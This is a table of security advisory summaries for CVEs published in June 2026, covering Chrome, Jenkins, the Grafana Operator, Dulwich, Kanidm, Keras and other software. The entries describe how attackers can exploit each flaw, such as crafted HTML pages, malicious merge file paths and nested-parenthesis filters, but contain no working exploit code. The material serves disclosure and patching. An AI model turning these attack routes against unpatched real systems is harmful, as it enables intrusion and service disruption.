| Google--Chrome | Use after free in Extensions in Google Chrome prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11652 |
| Google--Chrome | Inappropriate implementation in Extensions in Google Chrome prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11653 |
| Google--Chrome | Use after free in CameraCapture in Google Chrome on Mac prior to 149.0.7827.103 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11654 |
| Google--Chrome | Integer overflow in Media in Google Chrome on Mac prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11655 |
| Google--Chrome | Use after free in ServiceWorker in Google Chrome prior to 149.0.7827.103 allowed an attacker who convinced a user to install a malicious extension to potentially perform a sandbox escape via a crafted Chrome Extension. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11656 |
| Google--Chrome | Use after free in Payments in Google Chrome on Mac prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11657 |
| Google--Chrome | Insufficient validation of untrusted input in Extensions in Google Chrome prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11658 |
| Google--Chrome | Integer overflow in UI in Google Chrome on Linux prior to 149.0.7827.103 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11659 |
| Google--Chrome | Insufficient validation of untrusted input in New Tab Page in Google Chrome prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11660 |
| Google--Chrome | Use after free in Views in Google Chrome on Windows prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11661 |
| Google--Chrome | Type Confusion in Bindings in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11662 |
| Google--Chrome | Use after free in Skia in Google Chrome prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11663 |
| Google--Chrome | Use after free in Payments in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11664 |
| Google--Chrome | Out of bounds read in Dawn in Google Chrome on Windows prior to 149.0.7827.103 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11665 |
| Google--Chrome | Insufficient validation of untrusted input in Input in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11666 |
| Google--Chrome | Out of bounds read in WebRTC in Google Chrome prior to 149.0.7827.103 allowed a remote attacker who had compromised the GPU process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11667 |
| Google--Chrome | Uninitialized Use in Codecs in Google Chrome on Linux, ChromeOS prior to 149.0.7827.103 allowed a remote attacker to leak cross-origin data via a crafted video file. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11668 |
| Google--Chrome | Out of bounds read in Media in Google Chrome on ChromeOS prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11669 |
| Google--Chrome | Use after free in PDF in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted PDF file. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11670 |
| Google--Chrome | Use after free in Navigation in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11671 |
| Google--Chrome | Heap buffer overflow in GPU in Google Chrome on Android prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11672 |
| Google--Chrome | Use after free in InterestGroups in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11673 |
| Google--Chrome | Use after free in Guest View in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11674 |
| Google--Chrome | Out of bounds read in Skia in Google Chrome prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11675 |
| Google--Chrome | Insufficient validation of untrusted input in Dawn in Google Chrome on Linux and ChromeOS prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11676 |
| Google--Chrome | Race in Network in Google Chrome on Mac prior to 149.0.7827.103 allowed a remote attacker who had compromised the network process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11677 |
| Google--Chrome | Integer overflow in libyuv in Google Chrome prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11678 |
| Google--Chrome | Use after free in Codecs in Google Chrome on Windows prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11679 |
| Google--Chrome | Use after free in Media in Google Chrome on Windows prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11680 |
| Google--Chrome | Use after free in Ozone in Google Chrome on Linux prior to 149.0.7827.103 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11681 |
| Google--Chrome | Inappropriate implementation in Views in Google Chrome on Linux prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11682 |
| Google--Chrome | Use after free in WebCodecs in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11683 |
| Google--Chrome | Insufficient policy enforcement in Network in Google Chrome prior to 149.0.7827.103 allowed a remote attacker who had compromised the utility process to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11684 |
| Google--Chrome | Inappropriate implementation in MediaCapture in Google Chrome on Mac prior to 149.0.7827.103 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11685 |
| Google--Chrome | Insufficient validation of untrusted input in Dawn in Google Chrome on macOS prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11686 |
| Google--Chrome | Use after free in Dawn in Google Chrome on Mac prior to 149.0.7827.103 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11687 |
| Google--Chrome | Inappropriate implementation in SVG in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11688 |
| Google--Chrome | Insufficient policy enforcement in Passwords in Google Chrome prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11689 |
| Google--Chrome | Out of bounds read and write in Media in Google Chrome on Mac prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11690 |
| Google--Chrome | Insufficient validation of untrusted input in New Tab Page in Google Chrome prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11691 |
| Google--Chrome | Use after free in Read Anything in Google Chrome prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11692 |
| Google--Chrome | Inappropriate implementation in Plugins in Google Chrome prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11693 |
| Google--Chrome | Use after free in ServiceWorker in Google Chrome prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11694 |
| Google--Chrome | Inappropriate implementation in Passwords in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11695 |
| Google--Chrome | Uninitialized Use in Video in Google Chrome on Windows prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11696 |
| Google--Chrome | Insufficient validation of untrusted input in UI in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11697 |
| Google--Chrome | Use after free in Bluetooth in Google Chrome on Mac prior to 149.0.7827.103 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11698 |
| Google--Chrome | Use after free in Bluetooth in Google Chrome on Mac prior to 149.0.7827.103 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11699 |
| Google--Chrome | Use after free in Tracing in Google Chrome prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-08 | not yet calculated | CVE-2026-11700 |
| Google--Chrome | Inappropriate implementation in Guest View in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-08 | not yet calculated | CVE-2026-11701 |
| Google--Chrome | Use after free in Core in Google Chrome on Windows prior to 149.0.7827.115 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-11 | not yet calculated | CVE-2026-12007 |
| Google--Chrome | Use after free in DigitalCredentials in Google Chrome prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-11 | not yet calculated | CVE-2026-12008 |
| Google--Chrome | Insufficient validation of untrusted input in Accessibility in Google Chrome on Mac prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-11 | not yet calculated | CVE-2026-12009 |
| Google--Chrome | Heap buffer overflow in GPU in Google Chrome on Android prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-11 | not yet calculated | CVE-2026-12010 |
| Google--Chrome | Use after free in WebMIDI in Google Chrome on Windows prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-11 | not yet calculated | CVE-2026-12011 |
| Google--Chrome | Use after free in Network in Google Chrome prior to 149.0.7827.115 allowed an attacker in a privileged network position to potentially exploit heap corruption via malicious network traffic. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12012 |
| Google--Chrome | Use after free in Media in Google Chrome on Windows prior to 149.0.7827.115 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12013 |
| Google--Chrome | Use after free in Cast in Google Chrome prior to 149.0.7827.115 allowed an attacker on the local network segment to potentially perform a sandbox escape via malicious network traffic. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12014 |
| Google--Chrome | Use after free in Autofill in Google Chrome prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12015 |
| Google--Chrome | Inappropriate implementation in DevTools in Google Chrome prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12016 |
| Google--Chrome | Inappropriate implementation in Extensions in Google Chrome prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12017 |
| Google--Chrome | Inappropriate implementation in Mojo in Google Chrome on Windows prior to 149.0.7827.115 allowed a local attacker to perform OS-level privilege escalation via a malicious file. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12018 |
| Google--Chrome | Heap buffer overflow in Codecs in Google Chrome on Linux and ChromeOS prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12019 |
| Google--Chrome | Use after free in Autofill in Google Chrome on Mac prior to 149.0.7827.115 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12020 |
| Google--Chrome | Race in Safe Browsing in Google Chrome on Mac prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a malicious file. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12022 |
| Google--Chrome | Use after free in GPU in Google Chrome on Mac prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12023 |
| Google--Chrome | Insufficient policy enforcement in DevTools in Google Chrome prior to 149.0.7827.115 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12024 |
| Google--Chrome | Insufficient validation of untrusted input in Network in Google Chrome prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12025 |
| Google--Chrome | Out of bounds read in Video in Google Chrome on ChromeOS prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12026 |
| Google--Chrome | Inappropriate implementation in Headless in Google Chrome prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12027 |
| Google--Chrome | Use after free in GPU in Google Chrome on Android prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12028 |
| Google--Chrome | Use after free in Video in Google Chrome on Windows prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12029 |
| Google--Chrome | Out of bounds write in GPU in Google Chrome on Android prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12030 |
| Google--Chrome | Inappropriate implementation in Views in Google Chrome on Windows prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12031 |
| Google--Chrome | Inappropriate implementation in Passwords in Google Chrome on Android prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12032 |
| Google--Chrome | Out of bounds read in VideoCapture in Google Chrome prior to 149.0.7827.115 allowed a remote attacker who had compromised the GPU process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12033 |
| Google--Chrome | Insufficient validation of untrusted input in Linux Toolkit Theming in Google Chrome on Linux prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a malicious file. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12034 |
| Google--Chrome | Use after free in Views in Google Chrome on Windows prior to 149.0.7827.115 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12035 |
| Google--Chrome | Race in V8 in Google Chrome prior to 144.0.7559.99 allowed a remote attacker to potentially exploit type confusion via a crafted HTML page. (Chromium security severity: High) | 2026-06-10 | not yet calculated | CVE-2026-1220 |
| Google--MCP Toolbox for Databases | The Model Context Protocol has a security warning advising servers to validate the "Origin" header on all incoming connections to prevent DNS rebinding attacks. Prior to the v0.25.0 release, users had no way to validate the origin's host. In v0.25.0, a new "--allowed-hosts" flag was introduced alongside the existing "--allowed-origins" flag, enabling users to specify permitted hosts at server startup. Both flags default to "*", allowing users to implement strict access controls as needed without breaking existing setups. If either flag is set to "*", the server will output a startup warning about potential vulnerabilities. Documentation has also been updated to highlight these security considerations. | 2026-06-13 | not yet calculated | CVE-2026-11624 |
| GPAC--MP4Box v2.4 | A stack buffer overflow in the filein_process function (in_file.c) of GPAC MP4Box v2.4 allows attackers to cause a Denial of Service (DoS) via supplying a crafted MP4 file. | 2026-06-09 | not yet calculated | CVE-2025-52292 |
| GPAC--MP4Box v2.4 | A segmentation violation in the gf_hevc_read_sps_bs_internal function (media_tools/av_parsers.c) of GPAC MP4Box v2.4 allows attackers to cause a Denial of Service (DoS) via supplying crafted HEVC SPS data. | 2026-06-09 | not yet calculated | CVE-2025-52293 |
| GPAC--MP4Box v2.4 | A NULL pointer dereference in the gf_isom_get_user_data_count function (isomedia/isom_read.c) of GPAC MP4Box v2.4 allows attackers to cause a Denial of Service (DoS) via supplying a crafted MP4 file. | 2026-06-09 | not yet calculated | CVE-2025-55651 |
| GPAC--MP4Box v2.4 | A NULL pointer dereference in the gf_odf_vvc_cfg_write_bs function (odf/descriptors.c) of GPAC MP4Box v2.4 allows attackers to cause a Denial of Service (DoS) via supplying a crafted MP4 file. | 2026-06-09 | not yet calculated | CVE-2025-55657 |
| GPAC--MP4Box v2.4 | GPAC MP4Box v2.4 was discovered to contain a floating point exception in the gf_opus_parse_packet_header function (media_tools/av_parsers.c). This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted MP4 file. | 2026-06-09 | not yet calculated | CVE-2025-55658 |
| GPAC--MP4Box v2.4 | A NULL pointer dereference in the ctts_box_write function (isomedia/box_code_base.c) of GPAC MP4Box v2.4 allows attackers to cause a Denial of Service (DoS) via supplying a crafted MP4 file. | 2026-06-09 | not yet calculated | CVE-2025-55659 |
| Grafana--Grafana Operator | We have released version 5.24.0 of the Grafana Operator. This patch includes a CRITICAL severity security fix for a path traversal/privilege escalation vulnerability in the Grafana Operator. Summary: The Grafana Operator supports loading dashboards and library panels using the jsonnet data templating language. The jsonnet expression is evaluated in the context of the operator manager pod. Impact: It is possible for a malicious user who can create Dashboard or LibraryPanel resources for a Grafana instance to obtain the Kubernetes service account token of the Grafana Operator manager. Affected versions: All Grafana Operator versions <= 5.23. Solutions and mitigations: All installations should be upgraded as soon as possible. As a workaround, the following ValidatingAdmissionPolicy prevents the creation or modification of jsonnet based resources: apiVersion: admissionregistration.k8s.io/v1 kind: ValidatingAdmissionPolicy metadata: name: "prevent-jsonnet-dashboards" spec: failurePolicy: Fail matchConstraints: resourceRules: - apiGroups: ["grafana.integreatly.org"] apiVersions: ["v1beta1"] operations: ["CREATE", "UPDATE"] resources: ["grafanadashboards", "grafanalibrarypanels"] validations: - expression: "!has(object.spec.jsonnetLib)" --- apiVersion: admissionregistration.k8s.io/v1 kind: ValidatingAdmissionPolicyBinding metadata: name: "prevent-jsonnet-dashboards-clusterwide" spec: policyName: "prevent-jsonnet-dashboards" validationActions: [Deny] Acknowledgement: We would like to thank Artem Cherezov for responsibly disclosing the vulnerability. | 2026-06-13 | not yet calculated | CVE-2026-11769 |
| Haskell Programming Language--crypton-certificate | The crypton-x509-validation Haskell library fails to enforce X.509 NameConstraints, allowing TLS clients to accept certificates whose Subject Alternative Names fall outside the issuing CA's permitted subtrees. This oversight enables an attacker who compromises a name-constrained sub-CA to impersonate domains beyond its intended scope. | 2026-06-11 | not yet calculated | CVE-2026-9648 |
| HMBRAND--DBI | DBI versions before 1.648 for Perl saved errors in a limited-sized buffer. Error messages that were returned when RaiseError, PrintError or HandleError were set were written to a 200-byte buffer without a length limit. Attackers that can influence the error text in an application can trigger a buffer overflow. | 2026-06-09 | not yet calculated | CVE-2026-9698 |
| Imagination Technologies--Graphics DDK | Software installed and run as a non-privileged user may conduct improper GPU system calls to corrupt kernel heap memory. By creating resources of certain types and presenting a set of parameters to the affected interface the exploit can be used to corrupt kernel memory. | 2026-06-08 | not yet calculated | CVE-2026-22164 |
| Imagination Technologies--Graphics DDK | Software installed and run as a non-privileged user may conduct improper GPU system calls to cause mismanagement of a mapping state maintained for a sparse memory allocation. The product accidentally refers to the wrong memory due to the semantics of how math operations are implicitly scaled across buffers of different sizes. | 2026-06-08 | not yet calculated | CVE-2026-34194 |
| Imagination Technologies--Graphics DDK | Software installed and run as a non-privileged user may conduct intentional GPU sparse memory API calls to cause out of bounds write in the kernel. The product incorrectly indexes internal state when performing sparse allocation remapping. | 2026-06-12 | not yet calculated | CVE-2026-34195 |
| Imagination Technologies--Graphics DDK | An attacker could cooperatively pass data from one secure GPU process to another secure GPU process through shared secure memory allocations in the kernel module. Additionally, an attacker could disrupt the operation of another secure GPU process, leading to image corruption / GPU hardware recovery. Sharing secure memory allocations among various GPU secure processes allows an attacker to corrupt a shared resource, affecting other users. | 2026-06-12 | not yet calculated | CVE-2026-41155 |
| Imagination Technologies--Graphics DDK | A web page containing unusual WebGPU content, loaded into the GPU GLES render process, can trigger an out-of-bounds write in the GPU user-space driver, leading to memory corruption and a possible browser/GPU process crash. The software computes a required memory size from untrusted input, but integer overflow can produce a value smaller than needed. Subsequent write operations may then occur past the intended memory boundary, corrupting adjacent memory and causing process instability or termination. | 2026-06-12 | not yet calculated | CVE-2026-41157 |
| Imagination Technologies--Graphics DDK | Software installed and run as a non-privileged user may conduct GPU system calls to write to arbitrary freed physical pages. Physical memory allocated and freed without the deferred free mechanism can lead to those resources being used for read/write by the GPU after the kernel module has freed the resource. | 2026-06-12 | not yet calculated | CVE-2026-41158 |
| jelmer--dulwich | Dulwich is a pure-Python implementation of the Git file formats and protocols. Starting in version 0.24.0 and prior to version 1.2.5, Dulwich's `ProcessMergeDriver` substitutes the file path (from the git tree, controllable by an attacker via a malicious branch) into the merge driver command via the `%P` placeholder and executes it with `subprocess.run(..., shell=True)`. An attacker who can cause a victim to merge an untrusted branch can achieve arbitrary command execution by crafting malicious file paths. Version 1.2.5 fixes the issue. | 2026-06-10 | not yet calculated | CVE-2026-42563 |
| Jenkins Project--Jenkins | In Jenkins 2.567 and earlier, LTS 2.555.2 and earlier, it is possible for attackers to have Jenkins deserialize arbitrary types defined in Jenkins core or plugins from an attacker-controlled `config.xml` submission in a way that allows them to handle HTTP requests afterwards. This can be used to impersonate any user and send HTTP requests on their behalf, up to and including use of the Script Console to run arbitrary code, or to read arbitrary files from the Jenkins controller. | 2026-06-10 | not yet calculated | CVE-2026-53435 |
| Jenkins Project--Jenkins | Jenkins 2.567 and earlier, LTS 2.555.2 and earlier improperly determines that a redirect URL after login is legitimately pointing to Jenkins when it contains relative path segments (`./` or `../`), allowing attackers to perform phishing attacks. | 2026-06-10 | not yet calculated | CVE-2026-53436 |
| Jenkins Project--Jenkins | Jenkins 2.567 and earlier, LTS 2.555.2 and earlier improperly determines that a redirect URL after login is legitimately pointing to Jenkins when it contains tab or newline characters between `//`, allowing attackers to perform phishing attacks. | 2026-06-10 | not yet calculated | CVE-2026-53437 |
| Jenkins Project--Jenkins | A missing permission check in Jenkins 2.567 and earlier, LTS 2.555.2 and earlier allows attackers with Item/Cancel permission, but lacking Item/Read permission, to cancel queue items they do not have permission to view. | 2026-06-10 | not yet calculated | CVE-2026-53438 |
| Jenkins Project--Jenkins | Missing permission checks in Jenkins 2.567 and earlier, LTS 2.555.2 and earlier allow attackers with Overall/Read permission to determine other users' configured timezone and to enumerate view names of other users' "My Views". | 2026-06-10 | not yet calculated | CVE-2026-53439 |
| Jenkins Project--Jenkins | Jenkins 2.567 and earlier, LTS 2.555.2 and earlier does not ensure that the "from" parameter in the "Delegate to servlet container" security realm is safe to redirect to after login, allowing attackers to perform phishing attacks by redirecting users to an attacker-controlled domain. | 2026-06-10 | not yet calculated | CVE-2026-53440 |
| Jenkins Project--Jenkins | Jenkins 2.483 through 2.567 (both inclusive), LTS 2.492.1 through 2.555.2 (both inclusive) does not escape the user-provided description of a generic offline cause that could be set through the `POST config.xml` API, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Agent/Configure permission. | 2026-06-10 | not yet calculated | CVE-2026-53441 |
| Jenkins Project--Jenkins | Jenkins 2.567 and earlier, LTS 2.555.2 and earlier does not encrypt secrets from POST config.xml submissions before storing them in job configurations unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Item/Extended Read permission, or access to the Jenkins controller file system. | 2026-06-10 | not yet calculated | CVE-2026-53442 |
| kanidm--kanidm | Kanidm is an identity management platform. Prior to version 1.9.3, a single unauthenticated GET to any /scim/v1/... endpoint with a ?filter= query string of a few thousand nested parentheses (≈ 4-12 KB) drives the recursive-descent PEG parser past the worker thread's stack guard page. Rust responds to stack overflow with std::process::abort() - the entire kanidmd process exits. The parse runs inside axum's Query<ScimEntryGetQuery> extractor, before any handler body and therefore before any ACL check. This issue has been patched in version 1.9.3. | 2026-06-10 | not yet calculated | CVE-2026-46689 |
| kedro-org--kedro-org/kedro | A vulnerability in Kedro version 1.2.0 allows an attacker to exploit path traversal by providing a crafted version string. The `_get_versioned_path()` method in `kedro/io/core.py` directly interpolates user-supplied version strings into filesystem paths without sanitization. This enables an attacker to escape the intended versioned dataset directory and access files outside the expected path. The issue is also reachable through the CLI via the `--load-versions` parameter, as `_split_load_versions()` in `kedro/framework/cli/utils.py` does not validate the version string. This vulnerability can lead to unauthorized file reads, data poisoning, cross-project or cross-tenant data access, and broader downstream impacts in environments where Kedro is used with automation or orchestration layers. | 2026-06-12 | not yet calculated | CVE-2026-3840 |
| keras-team--keras-team/keras | Keras versions prior to 3.14.0 are vulnerable to a path traversal issue in the archive extraction utilities located in `keras/src/utils/file_utils.py`. The functions `filter_safe_tarinfos()` and `filter_safe_zipinfos()` validate archive member paths against the process current working directory (CWD) instead of the actual extraction destination. When the process runs with CWD set to `/`, which is common in Docker containers, CI/CD runners, and Jupyter environments, the validation boundary becomes the filesystem root, allowing traversal paths to bypass the security check. Additionally, the zip filter contains a bug that causes an `AttributeError` when a blocked entry is encountered, leading to incomplete extraction. Furthermore, Python 3.11 installations lack the `filter="data"` safety net, leaving them entirely reliant on the flawed CWD-based filter. Exploitation of this vulnerability can result in arbitrary file writes outside the intended extraction directory, enabling attackers to overwrite configuration files, inject malicious code, or corrupt machine learning datasets and pipelines. | 2026-06-11 | not yet calculated | CVE-2026-11816 |
